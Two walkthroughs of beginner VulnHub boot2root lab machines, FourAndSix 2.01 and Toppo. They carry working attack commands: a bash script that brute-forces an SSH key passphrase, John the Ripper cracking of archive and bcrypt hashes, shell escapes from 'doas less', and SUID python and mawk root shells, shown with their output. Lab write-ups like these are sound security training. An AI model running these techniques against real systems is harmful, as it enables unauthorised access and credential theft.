Walkthrough – FourAndSix 2.01

FourAndSix 2.01 is a boot2root aimed at beginners.  You can download it from vulnhub here.

Scanning & Vulnerability Analysis

First step is to find our target’s IP address. We’ll accomplish this with arp-scan


arp-scan -l

Our target is located at 192.168.56.102. The next step is to determine what ports are open, using nmap.


nmap -sV -T4 -O -F --version-light 192.168.56.102

Port :22

OpenSSH 7.9 is connected to port 22. Some cursory research with searchsploit reveals no likely vulnerabilities here.

Port :2049

There is a network file share running behind port 2049. We can use showmount to tell us what directory(ies) is being shared. Incidentally, we also learn the likely name of one of the users on the machine, too.

We make a directory to which we will mount that network share, and then mount it. Keep in mind, this isn’t downloading a copy of those files, we are connecting directly to the files on that computer. I forgot this while working with this target, and ended up doing a lot of the following work on the target machine rather than locally. Looking in the network share, we find a 7zip archive. The archive appears to contain a number of images, along with a public and private key. These might be useful for logging into the target via SSH!

Exploitation

7z Brute-Force

If we try to extract the files, though, we’ll find that the archive is password protected!

Luckily, JohnTheRipper (JTR) is capable of brute-forcing 7zip archive passwords. I quickly found that the tool to convert 7zip archives into a format that JTR can handle is included in the version installed on Kali. I followed the instructions at this post to get the correct version, and then progressed with brute-forcing. First, the password hash needs to be pulled from the archive with the following command:


/opt/JohnTheRipper/run/7z2john.pl backup.7z > backup.7z.hash

Then, using john and rockyou.txt, we can brute-force that hash.

Now that we have the password, we can extract the files from the archive.

Looks like the images are just fluff, we could always come back and look for some hidden information in them if we needed to. Let’s start with the id_rsa files, though.

SSH

Taking a look at the public key, the key’s comment is user@fourandsix2. This matches the directory name of the file share (/home/user/storage), and indicates that our username is likely literally “user”

Let’s try logging in with the key.

Unfortunately, the key is protected with a password, meaning we will have to brute force a second password. This is why it is best practice to protect authentication certificates whenever possible. If the user had not, we would already have authenticated access to his/her system.

SSH Brute-Force

Now I tried using john to crack this password, too, but I couldn’t get it to work. I even ended up checking some other write-ups to see if others had any success, and I couldn’t find anyone who had. Not the end of the world, though, we can write our own script to brute-force the credentials. It won’t be nearly as fast, but it should work.


#!/bin/bash

IFS=$'\n'       # make newlines the only separator
set -f          # disable globbing
for pass in $(cat < "$1"); do
  # echo "tester: $pass"
  if ssh-keygen -c -C "user@fourandsix" -P "$pass" -f "$2" &>/dev/null
    then
      echo "[+] Password Found: $pass"
      break
  fi
done

Success!

SSH Login

Now that we have a password, we can try logging in to the target again.

Reconnaissance

Unfortunately, sudo isn’t available, so that escalation isn’t available to us. With Toppo, we had success with files that had the suid bit set (see that walkthrough for a quick explanation of what this is and how it can be used). This time I tried a different one-liner to list all of the files owned by root that had that bit set.


find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Vulnerability Analysis

doas

4th in the list is /usr/bin/doas. Of course sudo wasn’t available, I completely overlooked the OS type identified by nmap in the beginning. We’re working with an OpenBSD target, doas is like sudo but on OpenBSD machines. Let’s see if we can identify whether or not “user” is authorized to use doas.

“user” is allowed to read the contents of the authorization log as root using the command less. This is our ticket! less has a dangerous convenient feature that allows us to execute a shell from within the program. If we are allowed to run less as root, and we can open a shell from within less, we can likely escalate our privileges very easily.

Exploitation

doas less

Let’s read the contents of the auth log as root with less


doas /usr/bin/less /var/log/authlog

From within less, we can get a shell by typing ‘v’ which starts “visual mode” and allows us to enter in a command followed by ‘:!sh’ which opens up a new shell. Let’s see who we are.

We have root!

Bonus – Get Root Password

Let’s see if we can crack any user passwords. First step is to grab the passwd and shadow-equivalent files. The BSD equivalent of /etc/shadow is /etc/master.passwd. Since we have root, we can save each of these files to the file share, change the owner of these copies, and copy them onto our attacker machine.

Next, we use unshadow to convert these two files into a format that john can handle


unshadow passwd master.passwd > unshadowed

The password hashes are bcrypt hashes, we can use john and rockyou.txt to try to brute-force them.


john --format=bcrypt -w /usr/share/wordlists/rockyou.txt unshadowed

After a little bit, I was able to successfully crack the root password, princess1

Walkthrough – Toppo

Toppo is a boot2root aimed at beginners.  You can download it from vulnhub here.

Scanning

First step is to find our target’s IP address. We’ll accomplish this via arp-scan

arp-scan -l
[...snip...]
10.10.10.22 00:0c:29:54:8d:88 VMware, Inc.
[...snip...]

Our target is located at 10.10.10.22. The next step is to determine what ports are open, using nmap.

nmap -p 1-65535 -T4 -A -v 10.10.10.22
[...snip...]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind
[...snip...]

Port :22

OpenSSH 6.7p1 is running on port 22.  Our nmap scan also tells us that it is likely a Debian version.

Port :80

Apache httpd 2.4.10 is running on port 8.  Nmap states that it is likely a Debian version as well, again indicating that the target is likely a Debian box.

Vulnerability Analysis

SSH

A quick scan of searchsploit doesn’t return any exploits for our version of OpenSSH.  In theory, we could still try to brute force our way in, but without even knowing a username, this is unlikely to succeed.

HTTP

There don’t appear to be any useful exploits for our version of Apache, time to take a look at the website that is running.

It appears to be a Bootstrap CMS site.  This is my first time encountering them, and after a quick Google search, it doesn’t appear like there are any standard login portals like you might have with a WordPress site (wp-admin).  Nothing yielded by searchsploit either.  There’s also no robots.txt file!

Next step, nikto.

root@kali:~# nikto --host=http://10.10.10.22
[...snip...]
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
[...snip...]

/admin/ is indeed interesting.  It has directory indexing, meaning you can view all of the files located at that directory.  It contains one file titled notes.txt

Opening that file yields a lovely little note to self, with what appears to be a password!

At this point I spent a lot of time searching again for some sort of login page for management of the website, but had no luck.  That’s when I remembered that SSH is accessible.  It couldn’t be that easy…

Exploitation

SSH Login

Taking a guess that if the user’s password is 12345ted123, then maybe his username is ted, I tried to log in via SSH.

root@kali:~# sshpass -p 12345ted123 ssh ted@10.10.10.22

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jul 23 14:26:06 2018 from 10.10.10.23
ted@Toppo:~$

Reconnaissance

Sudo

It’s been simple enough so far, maybe ted is able to execute commands with sudo?  Let’s check:

ted@Toppo:~$ sudo -l
-bash: sudo: command not found

So sudo isn’t even available… interesting.

SUID

The suid bit in linux file permissions basically allows a user to execute a command as the owner of that file, rather than as your current user.  An example of this would be the passwd command.  Passwd modifies system files like /etc/passwd and /etc/shadow, something that requires root privileges.  That means that in order for a user to change their password, they need to be able to execute passwd as root.  Sometimes, files will have the suid bit set that can allow you to execute arbitrary commands, serving as a great privilege escalation vector.  For this reason, let’s search for files with SUID bit set, and see if there’s anything interesting.

The command that we will use is below:

find / -perm +4000 -user root -type f -print 2>/dev/null

The +4000 will search for files with SUID set, -user root only shows those owned by root.  If we are trying to escalate our privileges, we aren’t currently interested in running commands as users other than root. -type f will only return files, and not directories.  -print will output the entire path of matches, instead of just the file name.  And finally, 2>/dev/null redirects stderr to the bit bucket so we don’t have to see any errors about not having permission to search various folders.

The results are below:

/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd

There are two items that stand out, python and mawk.  Both of these are interpreters that can execute python and awk code, respectively.

Vulnerability Analysis

Python

Python can execute linux commands in a number of ways.  My method of choice is via pty.spawn, as shown below:

import pty
pty.spawn("/bin/sh")

The above lines will open a new sh shell. In order to execute that python code from the terminal, taking advantage of our suid bit on /usr/bin/python2.7, we’d execute the following:

ted@Toppo:~$ python -c 'import pty;pty.spawn("/bin/sh")'

Mawk

I believe that there are a number of ways that mawk could execute linux commands, the only one that I am familiar with is below:

mawk 'BEGIN {system("/bin/sh")}'

Exploitation

Both of the above two vulnerabilities should be usable to escalate to root privileges.  We’ll next test each of them

Python

ted@Toppo:~$ python -c 'import pty;pty.spawn("/bin/sh")'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# hostname
Toppo
# cat /root/flag.txt
_________
| _ _ |
|_/ | | \_|.--. _ .--. _ .--. .--.
| | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|

Congratulations ! there is your flag : 0wnedlab{p4[censored]}

#

Without unispace fonts, it doesn’t turn out well, but that is supposed to say Toppo…

Mawk

ted@Toppo:~$ mawk 'BEGIN {system("/bin/sh")}'
# id
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# hostname
Toppo
# cat /root/flag.txt
_________
| _ _ |
|_/ | | \_|.--. _ .--. _ .--. .--.
| | / .'`\ \[ '/'`\ \[ '/'`\ \/ .'`\ \
_| |_ | \__. | | \__/ | | \__/ || \__. |
|_____| '.__.' | ;.__/ | ;.__/ '.__.'
[__| [__|

Congratulations ! there is your flag : 0wnedlab{p4[censored]}

#

And there you have it, root!  And two different ways!  I recommend filing that suid search one-liner for future use, it can be extremely helpful if you’re stuck looking for priv esc vectors.